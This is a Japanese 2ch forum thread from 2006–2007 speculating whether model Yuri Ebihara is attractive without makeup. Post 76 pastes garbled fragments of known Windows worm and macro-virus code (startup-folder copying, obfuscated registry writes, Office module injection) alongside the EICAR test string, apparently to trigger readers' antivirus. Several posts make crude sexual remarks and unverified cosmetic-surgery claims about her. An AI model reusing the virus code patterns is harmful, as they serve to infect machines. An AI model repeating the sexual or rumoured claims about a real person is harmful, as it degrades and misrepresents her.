2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【エビちゃん】蛯原友里はスッピンでもかわいいのか?

1 :名無しさん@お腹いっぱい。:2006/12/15(金) 07:10:33 ID:9dfMfUn/
かわいいだろ

2 :名無しさん@お腹いっぱい。:2006/12/15(金) 17:32:22 ID:EwEmMYAI
2ゲト!

3 :名無しさん@お腹いっぱい。:2006/12/15(金) 18:24:42 ID:dzsQPU3t
画像よろ

4 :名無しさん@お腹いっぱい。:2006/12/15(金) 18:59:53 ID:KfTqw/VN
可愛いよ。
むしろすっぴんの方が。

5 :名無しさん@お腹いっぱい。:2006/12/15(金) 19:03:33 ID:5CIcvwtn
若い頃の写真ググってみつけたけど
かわいかった。今よりぽっちゃりしてたけど
顔もあのまんまだよ

6 :名無しさん@お腹いっぱい。:2006/12/15(金) 22:45:27 ID:mShQT9xF
ゲームのCMも素敵だね。


7 :名無しさん@お腹いっぱい。:2006/12/18(月) 15:24:00 ID:9lQrP1D6
何回かキャンキャンにもすっぴんで出てたけど、やっぱ可愛いよ。
むしろナチュラルですっぴんのが好きだな。

肌も綺麗なのに、何でわざわざあんな厚化粧にしてんのかが謎。

8 :名無しさん@お腹いっぱい。:2006/12/18(月) 15:30:59 ID:00YHVUB6
マキアージュの新しいポスターみたけど,息が止まるほど綺麗だった。

9 :名無しさん@お腹いっぱい。:2006/12/18(月) 15:52:57 ID:nq6A2rzc
そのまま止まっちゃえばよかったのに

10 :名無しさん@お腹いっぱい。:2006/12/18(月) 16:04:28 ID:TMmVyFm2
エビちゃんはスッピンも可愛い

11 :名無しさん@お腹いっぱい。:2006/12/18(月) 16:25:33 ID:HLv4YZbM
今のあたしは最強でしょ?

12 :名無しさん@お腹いっぱい。:2006/12/18(月) 18:50:35 ID:r742x1SR
>>8
ドラッグストアにあるのか?
見たい・・・ついでに欲しい・・・

13 :名無しさん@お腹いっぱい。:2006/12/18(月) 20:17:23 ID:fEsXkT0E
昔の写真は見るからに田舎のねえちゃんだな。
今は精神病の人みたいでキモい

14 :名無しさん@お腹いっぱい。:2006/12/19(火) 13:45:30 ID:Pvh+wo7C
まんこにも化粧してんのかなぁ?

15 :名無しさん@お腹いっぱい。:2006/12/19(火) 14:18:16 ID:eiqrqFlG
してるがな

16 :名無しさん@お腹いっぱい。:2006/12/19(火) 14:20:12 ID:j0rL51Rb
蛯たん可愛いおぉ。。

17 :名無しさん@お腹いっぱい。:2006/12/19(火) 15:02:17 ID:Ke2HRgty
化粧板でエビのスッピン画像出回ってたよ
内山理奈に似てた

18 :名無しさん@お腹いっぱい。:2006/12/23(土) 01:25:50 ID:BxhGMZbc
探すのめんどくさいから貼って。

19 :名無しさん@お腹いっぱい。:2006/12/23(土) 01:46:55 ID:zrbs0I1I
実物肌汚いよ。
やっぱり写真とかは修正してるんだなって思った。
忙しいから疲れてるのかな

20 :名無しさん@お腹いっぱい。:2006/12/26(火) 22:40:29 ID:n3qyRtbT
>>7
自分もキャンキャンですっぴん見た事あるけど、
あれって完全なすっぴんじゃなくてベースメイクはしてるんだよね。

21 :名無しさん@お腹いっぱい。:2006/12/28(木) 13:48:35 ID:coo6aLth
個性のある顔で今と違うよ。今は痩せて眉を内側に寄せて書いて、アイメイクの力で目も違う。

22 :名無しさん@お腹いっぱい。:2006/12/28(木) 18:17:48 ID:uGC+Khi9
凄い綺麗な顔
同性の私から見ても惚れ惚れする

23 :名無しさん@お腹いっぱい。:2006/12/30(土) 00:14:46 ID:e0N6eIii
カワイイとキレイの比率が7:3くらいだと思うな。
スッピンでもそう劣化するとは思えない。

24 :名無しさん@お腹いっぱい。:2006/12/30(土) 02:47:38 ID:93oAR4qq
かわいいおぉ。輪郭も綺麗だおね。蛯たん好きだおぉ。

25 :名無しさん@お腹いっぱい。:2006/12/30(土) 03:42:16 ID:zbWZviSI
綺麗だけど整形が目立ちすぎるのが痛い

26 :名無しさん@お腹いっぱい。:2006/12/30(土) 04:08:05 ID:QZXS4b+9
双子の姉の方は白衣の天使

27 :名無しさん@お腹いっぱい。:2006/12/30(土) 06:36:23 ID:IqTQt0cq
蛯たん綺麗で可愛いくて。スタイルも良くて大好きだおぉ。

28 :名無しさん@お腹いっぱい。:2006/12/30(土) 11:20:41 ID:W1BItgCJ
>>26
それは妹でしょ。
双子の姉妹で、それぞれ別の分野で天使とは素晴らしい。

それはともかくとして、その病院に半月くらい

      入院させてください

29 :名無しさん@お腹いっぱい。:2006/12/30(土) 12:10:05 ID:0Rgeeop9
僕もよろしくお願いします。m(__)m

30 :名無しさん@お腹いっぱい。:2006/12/30(土) 13:12:09 ID:OfvAH73I
ビオレの化粧落とし?のCMで「ベースメイク命の女です〜こっそり仕込んだコンシーラー♪」

ベースメイクて何?
コンシーラーて何?

31 :名無しさん@お腹いっぱい。:2006/12/30(土) 13:46:10 ID:93QE0nhS
今日、レコ大で生エビちゃん見れるよ。

32 :名無しさん@お腹いっぱい。:2006/12/30(土) 15:03:14 ID:VlD99I1G
http://vista.undo.jp/img/vi6744021502.jpg

33 :名無しさん@お腹いっぱい。:2006/12/30(土) 15:28:13 ID:o0SBQD2c
http://s.pic.to/qoqu
  、  ∩
( ゚∀゚)彡 おっぱい!おっぱい!
 ⊂彡

34 :名無しさん@お腹いっぱい。:2006/12/30(土) 15:59:48 ID:IqTQt0cq
↑でっかいな〜。まさに巨だよ!

35 :名無しさん@お腹いっぱい。:2006/12/30(土) 16:24:54 ID:J7gEGwOX
>>30
ベースメイク:肌のメイク。
通常、下地とファンデーション使用。
目の化粧はアイメイク、唇のメイクはリップメイクと言う。

コンシーラー:目の下のクマやシミ、ニキビ跡などを、
ピンポイントで隠す化粧品。

36 :名無しさん@お腹いっぱい。:2007/01/04(木) 20:40:50 ID:pfv+AI1a
学生の頃は目と眉のパ−ツが外に離れてたはず

37 :名無しさん@お腹いっぱい。:2007/01/04(木) 20:49:23 ID:NhfoWvSW
>>33 すげぇ

38 :名無しさん@お腹いっぱい。:2007/01/04(木) 21:00:42 ID:/q20nz/c
>>33
逆に困るのではィ

39 :名無しさん@お腹いっぱい。:2007/01/04(木) 21:25:31 ID:NhfoWvSW
こまるだろうね

40 :名無しさん@お腹いっぱい。:2007/01/13(土) 12:37:34 ID:G8PvTxmn
蝦原友里たんホントは三十路だけど綺麗だニャ−。

41 :名無しさん@お腹いっぱい。:2007/01/13(土) 15:36:31 ID:3gi1gJnL
>>40
会社で30代の独身のおっさんがエビちゃんとか言ってるの
見ててきもいんですけど,どうすればいいでしょうか?

42 :名無しさん@お腹いっぱい。:2007/01/13(土) 22:47:08 ID:l3Ivx0ag

キモイと思うあなたの心が歪んでいるだけでしょう。

43 :名無しさん@お腹いっぱい。:2007/01/13(土) 23:28:35 ID:TWF9BIxv
蛯たんかわいい♪

44 :名無しさん@お腹いっぱい。:2007/01/14(日) 01:04:54 ID:TuG3S25A
エビちゃんがいつからタバコ吸い始めたか知ってる人いる?

45 :名無しさん@お腹いっぱい。:2007/01/14(日) 01:32:57 ID:nwwTgrRP
すっぴんでも、かなり綺麗でしょ。モデルがメイクに何時間も掛かる様じゃ
仕事にならんと思うのだが

46 :名無しさん@お腹いっぱい。:2007/01/14(日) 03:38:49 ID:uJb84MyO
スッピン別人。
自分もみかける機会あって「ハレ?」と思ったが、CanCam編集長も言ってたからそうなのだろう。

47 :名無しさん@お腹いっぱい。:2007/01/14(日) 04:58:44 ID:Moy/xXkQ

すっぴん見たことあるけどあんま変わらないよ

山田優はブスだった

48 :名無しさん@お腹いっぱい。:2007/01/14(日) 13:22:28 ID:lA8GX0jF
スッピンはトカゲ顔

49 :宮崎人:2007/01/14(日) 13:27:52 ID:nTZnJPLp
今えびちゃんが通ってた高校の先生に習ってるけど、高校の時から可愛かったってよ。

50 :名無しさん@お腹いっぱい。:2007/01/14(日) 13:50:22 ID:id0e9EYB
エビのすっぴんなんかググればすぐ出てくるよ。
妹とのツーショットも。
すっぴんの方が可愛いかった。

51 :名無しさん@お腹いっぱい。:2007/01/14(日) 15:01:03 ID:5YWlDyBS
えびちゃんのおっぱいって綺麗ですよね

52 :名無しさん@お腹いっぱい。:2007/01/14(日) 18:55:44 ID:3Wv882Ty
貧乳ビキニのポスター貰え
双子の妹もトカゲ
だいたい読者モデルな訳ないやろ

53 :名無しさん@お腹いっぱい。:2007/01/14(日) 19:00:00 ID:2jCAxR6/
すっぴんより
すっぽんぽんが見たい・・・。

54 :名無しさん@お腹いっぱい。:2007/01/17(水) 10:32:38 ID:h+ItJQSL
すっぽんぽんより、まんこが見たい・・・。

55 :名無しさん@お腹いっぱい。:2007/01/19(金) 14:57:21 ID:3FM97OUh0
まんこよりディルドーでストレッチした、ありの門渡りを見たい。

56 :名無しさん@お腹いっぱい。:2007/01/22(月) 07:45:06 ID:HAPidPPDO
肌荒れてる。カラコン外したら怖い。

57 :名無しさん@お腹いっぱい。:2007/01/22(月) 11:16:48 ID:1C8nYICO0
すっぴんぴんのすっぽんぽんがいいな。

58 :名無しさん@お腹いっぱい。:2007/01/22(月) 12:00:56 ID:PCRawOl90
http://yep.it/?7d88m2


59 :名無しさん@お腹いっぱい。:2007/01/22(月) 20:07:37 ID:xW85pDHJ0
エビ妹
http://hitorigoto2006.sakura.ne.jp/2006/12/ebi12-202.JPG

60 :名無しさん@お腹いっぱい。:2007/01/24(水) 09:43:23 ID:UnoJgR7+0
↑の見てもわかるけど友里も目のパ−ツが離れてたはずなんだよ。顔のバランスは美人じゃないよ。

61 :名無しさん@お腹いっぱい。:2007/01/27(土) 22:04:01 ID:ejR4SvGx0
>>50
あれはメイクしてるのよ〜。
エビたんは眉毛とアイライン(上も下も)、マスカラの力でこの顔になってるのよ。


62 :名無しさん@お腹いっぱい。:2007/01/28(日) 03:09:48 ID:rwKclxglO
うんそれと整形とカラコンと睫毛エクステでこの顔になってるのよー。

63 :名無しさん@お腹いっぱい。:2007/01/28(日) 14:33:26 ID:UXpbwimE0
エビちゃんはメタル

64 :名無しさん@お腹いっぱい。:2007/01/29(月) 03:48:23 ID:RRY2xRoIO
トカゲ

65 :名無しさん@お腹いっぱい。:2007/01/31(水) 10:14:45 ID:LDJ1pgO90
大和証券

66 :名無しさん@お腹いっぱい。:2007/02/03(土) 15:24:06 ID:Mqy+9ovIO
カラコンしてないだろ
黒目がデカいだけ。

67 :名無しさん@お腹いっぱい。:2007/02/03(土) 16:04:10 ID:xoF4p3hJ0
でかくないよ
カラコンしとるよ(だから黒目がでかく見える)
どうみてもはりつけとる眼球だけど

68 :名無しさん@お腹いっぱい。:2007/02/04(日) 01:43:56 ID:odWxZ/kBO
整形で目を切り開いた子はカラコン多いですよね?取ったらさん白眼なのかな?怖ッ。カラコンしても無表情になるから爬虫類ぽくなるね

69 :ヘアメイク:2007/02/04(日) 08:26:51 ID:/kT7vcuUO
化粧とったらかわいくないよ

70 :名無しさん@お腹いっぱい。:2007/02/04(日) 19:08:03 ID:PiOYNA+uO
えびちゃんのかち☆

71 :名無しさん@お腹いっぱい。:2007/02/04(日) 22:45:16 ID:5zNU7ty8O
すっぴんも普通に可愛いよ。肌は荒れてるけどね…厚化粧の代償だね

72 :名無しさん@お腹いっぱい。:2007/02/05(月) 01:11:26 ID:9mEn48aDO
どーみてもカラコンはしてねぇだろ。
雑誌の化粧ページよく見ろよ。あんな精巧なカラコンあったらアタシが欲しいくらいだ、うぷしろ。

73 :名無しさん@お腹いっぱい。:2007/02/05(月) 01:17:53 ID:1wuAbpsH0
昔の写真

http://www.asahi-net.or.jp/~KA3Y-MED/sub28.htm
http://www.asahi-net.or.jp/~KA3Y-MED/sub19.htm

http://www.asahi-net.or.jp/~KA3Y-MED/yuri11.jpg
http://www.asahi-net.or.jp/~KA3Y-MED/yuri05.jpg

http://www.asahi-net.or.jp/~KA3Y-MED/fukuchi1.jpg
http://www.asahi-net.or.jp/~KA3Y-MED/fukuchi2.jpg
http://www.asahi-net.or.jp/~KA3Y-MED/fukuchi3.jpg
http://www.asahi-net.or.jp/~KA3Y-MED/fukuchi4.jpg

74 :名無しさん@お腹いっぱい。:2007/02/05(月) 03:34:44 ID:jb9ASGAYO

妹も美人だよな

75 :名無しさん@お腹いっぱい。:2007/02/05(月) 12:06:28 ID:Q4ERcZ/s0
>>72
アキュビュメーカーかどうかはわからないけどこの前眼科検診でアキュビュの
カラコンシリーズ出てるの見たよ
欲しけりゃ買えば? 自分は必要ないけど
髪のカラーリングに合わせてカラコンしてると思うけど
赤茶系のカラーの時は赤茶系のカラコン
黄茶系のカラーの時はヘーゼル茶系カラコン


76 :名無しさん@お腹いっぱい。:2007/02/05(月) 19:57:56 ID:KCFC/Io40
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


77 :名無しさん@お腹いっぱい。:2007/02/06(火) 07:02:50 ID:EQqiV/UAO
カラコンはもう見飽きたし黒目デカくするのも不気味だから止めて欲しい。

78 :名無しさん@お腹いっぱい。:2007/02/06(火) 11:35:11 ID:7DdYUquKO
↑貴様はすっこんどれ、ぬらりひょんが。

79 :名無しさん@お腹いっぱい。:2007/02/08(木) 12:09:42 ID:9EtlOVdB0
これ見るとエビなんて目じゃねえな
http://page3.auctions.yahoo.co.jp/jp/auction/c132445358?u=the_charity_auction_1

乱交の新スレ
http://news23.2ch.net/test/read.cgi/news/1170894995/

80 :名無しさん@お腹いっぱい。:2007/02/08(木) 12:10:42 ID:jsWyOWxo0
スッピンマジヤバイって!!!!!!!!


81 :名無しさん@お腹いっぱい。:2007/02/08(木) 13:13:41 ID:cqTLKz1pO
↑貴様はすっこんどれ、ひょっとこが。

82 :名無しさん@お腹いっぱい。:2007/02/08(木) 14:25:35 ID:oImAf2qPO
↑ひょっとこって表現使ってるのが馬鹿クセーw

83 :名無しさん@お腹いっぱい。:2007/02/11(日) 02:55:30 ID:ZL+G0otoO
↑貴様は引っ込んどれ、平野レミが。

84 :名無しさん@お腹いっぱい。:2007/02/11(日) 03:08:40 ID:VN9Kli+1O
そらすっぴんにしたら眉も薄いし肌の染みやシワ目立つから若干おちるんじゃね?27だし。

85 :名無しさん@お腹いっぱい。:2007/02/11(日) 19:32:00 ID:4+UBBCZYO
えびちゃんのかち☆

86 :名無しさん@お腹いっぱい。:2007/02/11(日) 19:48:56 ID:KAnVlT5y0
芸能界の誰よりもアイメイク&ファンデの厚化粧度はエビの勝ち
みんな〜鼻全体をつまんでひとさし指で自分の鼻の頭を押さえてごらん

えびちゃんみたいな潰れたぺちゃんこの小鼻になっちゃうよ

87 :名無しさん@お腹いっぱい。:2007/02/11(日) 20:49:40 ID:ZL+G0otoO
↑貴様はすっこんどれ、アナゴが。

88 :名無しさん@お腹いっぱい。:2007/02/12(月) 20:22:42 ID:xLE5KYptO
ぶるぅぁぁぁあ!

89 :名無しさん@お腹いっぱい。:2007/02/14(水) 12:35:36 ID:EWqMvCJOO
可愛いエビちゃん♪

90 :名無しさん@お腹いっぱい。:2007/02/14(水) 12:39:27 ID:v7kBWovc0
蝦はスッポンでもかわいいのか?

91 :名無しさん@お腹いっぱい。:2007/02/14(水) 12:41:31 ID:Ekbg2Yk70
なあんだ整形だったのか。殴りてぇ。

92 :名無しさん@お腹いっぱい。:2007/02/14(水) 12:42:50 ID:mX7vHzhZO
スッポンはおいしいよo(^o^)o

93 :名無しさん@お腹いっぱい。:2007/02/14(水) 17:15:59 ID:s61iHrUp0
エビちゃんと違って「自分は鼻も高いしこんな(エビちゃんみたいなこて塗りアイメイク)しなくてもいい顔に生まれてよかった」と
改めて思わせてくれるエビちゃんの存在は最高
エビたんて小鼻は長所なんだけど鼻が超低いのと浮き彫りがない通ってない鼻筋が
赤ちゃんの骨格みたい
こーゆう骨格てファンデとノースシャドウとハイライト塗らない方がいいと思う
のっぺり骨格て塗っても意味がない
エビたんは今のまんまのアイメイクと眉毛と口紅だけのメイク法がいいと思う

94 ::2007/02/14(水) 17:35:05 ID:BVWAr6g1O
キサマはすっこんどれ、ムニエルが

95 :名無しさん@お腹いっぱい。:2007/02/14(水) 17:51:23 ID:EWqMvCJOO
>>93 何この物体

96 :名無しさん@お腹いっぱい。:2007/02/15(木) 01:21:48 ID:5FFvA9V/O
>>95
蛯ちゃんの化粧が変、というか似合ってないという指摘だよ〜。

97 :名無しさん@お腹いっぱい。:2007/02/17(土) 22:39:57 ID:vJ/+55g70
芸能人の秘蔵映像キタ━━━━━━(゚∀゚)━━━━━━

http://tv9.2ch.net/test/read.cgi/actor/1170878857/54

98 :名無しさん@お腹いっぱい。:2007/02/17(土) 22:52:47 ID:ZOTEj4bPO
↑貴様は氏ね、寄生虫が。

99 :名無しさん@お腹いっぱい。:2007/02/20(火) 16:29:44 ID:V6vFwPPw0
スッピンは目と眉が離れてる個性的な顔。


100 :名無しさん@お腹いっぱい。:2007/02/20(火) 17:37:26 ID:C6KBdmvg0
整形前のすっぴんは・・・・研ナオコに限りなく近い。

101 :名無しさん@お腹いっぱい。:2007/02/20(火) 17:39:14 ID:IlebPZ/1O
爬虫類

102 :名無しさん@お腹いっぱい。:2007/02/20(火) 17:51:22 ID:EvzC+eqjO
嫌い 彼氏がゾッコンだから

103 :名無しさん@お腹いっぱい。:2007/02/20(火) 18:56:24 ID:bu7pLQraO
はいはい、ブスゴリラ乙。研なおこ?美人じゃん。

104 :名無しさん@お腹いっぱい。:2007/02/20(火) 18:56:38 ID:dprL/QrUO
うちあんなに口角あがらへんわ〜

105 :名無しさん@お腹いっぱい。:2007/02/20(火) 18:59:39 ID:bu7pLQraO
だから何?あがろうがあがらんがブスのひがみは醜いだけ、性格ブスのひがみは更に醜いだけ。

106 :名無しさん@お腹いっぱい。:2007/02/20(火) 19:06:07 ID:eY5VLrLM0
よかった〜
こんなえびちゃんみたいなアイメイクこてこてしないといけない顔に生まれなくて
親に感謝しなくちゃ

107 :胡麻:2007/02/20(火) 20:18:51 ID:IazG1c+SO
エビちゃんかわいいじゃん。かわいいから女性に人気があるんじゃない?

108 :名無しさん@お腹いっぱい。:2007/02/20(火) 23:05:15 ID:bu7pLQraO
>>106エビも感謝してると思うよ、アイメイクや厚化粧しても可愛いままでいられて。ベースメイクの方が可愛いし。

109 :名無しさん@お腹いっぱい。:2007/02/20(火) 23:07:45 ID:Q28v1axW0
他の女とは段違いにいい!段違い。
段違い平行棒。


110 :名無しさん@お腹いっぱい。:2007/02/21(水) 05:56:06 ID:M2+VkXuG0
よかった〜
こんなエビみたいなマスカラ大量塗り(目がちっこいから特に目尻の方に多めにつけてる)or植えまつ毛&まつ毛ひきち切れそうなほどビューラーで根元からぐい上げ
&実際の横幅からはみ出したアイライナー(目がちっこいから)のアイメイクマジック
しなくてもいい顔に生まれて
親に感謝しなくちゃ

111 :名無しさん@お腹いっぱい。:2007/02/21(水) 11:00:17 ID:n0J+GY2U0
>>106>>110ひがみブス乙wwwww

112 :加藤ローサになりたい:2007/02/22(木) 01:20:52 ID:5IX3fccO0
えびちゃんは整形してるんですか?

113 :加藤ローサになりたい:2007/02/22(木) 01:23:23 ID:5IX3fccO0
えびちゃんはたばこ吸うの???
海老ちゃんにはベツキーとかりんかみたいに

面白いトークで日本を明るい社会にしてほしいでーす

114 :加藤ローサになりたい:2007/02/22(木) 01:26:16 ID:5IX3fccO0
エビチャンの売り出し方が下手だから
世間から非難されると思う

もっと同性や色々な世代に愛されるよう
プロデュースして売り出せば良いのに

周囲や事務所に賢いスタツフがいないのかなあ



115 :加藤ローサになりたい:2007/02/22(木) 01:28:52 ID:5IX3fccO0
日本の女性も欧米の女性のように

かわいこちゃんを演じなくても

楽しく生きれる世に海老ちゃんにがんばツて
世直ししてほしいでーす


116 :名無しさん@お腹いっぱい。:2007/02/22(木) 01:31:37 ID:D+uV5baSO
↑天然過ぎて売り出せないんだよ。エビは今が限界。梨花のように落ちぶれたらおしまいだね。

117 :加藤ローサになりたい:2007/02/22(木) 01:36:16 ID:5IX3fccO0
今夜のオーラの泉で三輪さんがいい話してました。
オーラの泉はいつも魂が元気になる番組で大好きです。
なぜえびちゃんは今が限界なの?

118 :名無しさん@お腹いっぱい。:2007/02/22(木) 01:56:41 ID:D+uV5baSO
事務所が天然キャラで売る気はないから。モデル本業というイメージで売り出したいんだろうね。演技は下手で避難受けてるしこれ以上壊す気はないでしょう。天然なのは世間にある程度バレてるんだけど。バラエティーはモデルよりグラドル使った方が受けるからね。

119 :ローサちゃん好き:2007/02/22(木) 04:43:44 ID:5IX3fccO0
天然とは?・

グラドルとはなんですか?

120 :ローサちゃん好き:2007/02/22(木) 04:50:20 ID:5IX3fccO0
天然はかわいいんじゃないの?

121 :名無しさん@お腹いっぱい。:2007/02/22(木) 08:23:32 ID:D+uV5baSO
天然すぎると引いちゃうかな、ちょっと天然くらいが可愛い。グラドルとはグラビアアイドルのことです。

122 :名無しさん@お腹いっぱい。:2007/02/23(金) 05:50:40 ID:xXIrA0/tO
多分>>120の言う天然とエビちゃんの天然はかなり違う。エビちゃんの天然が世に広まれば人気は激減する。

20 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)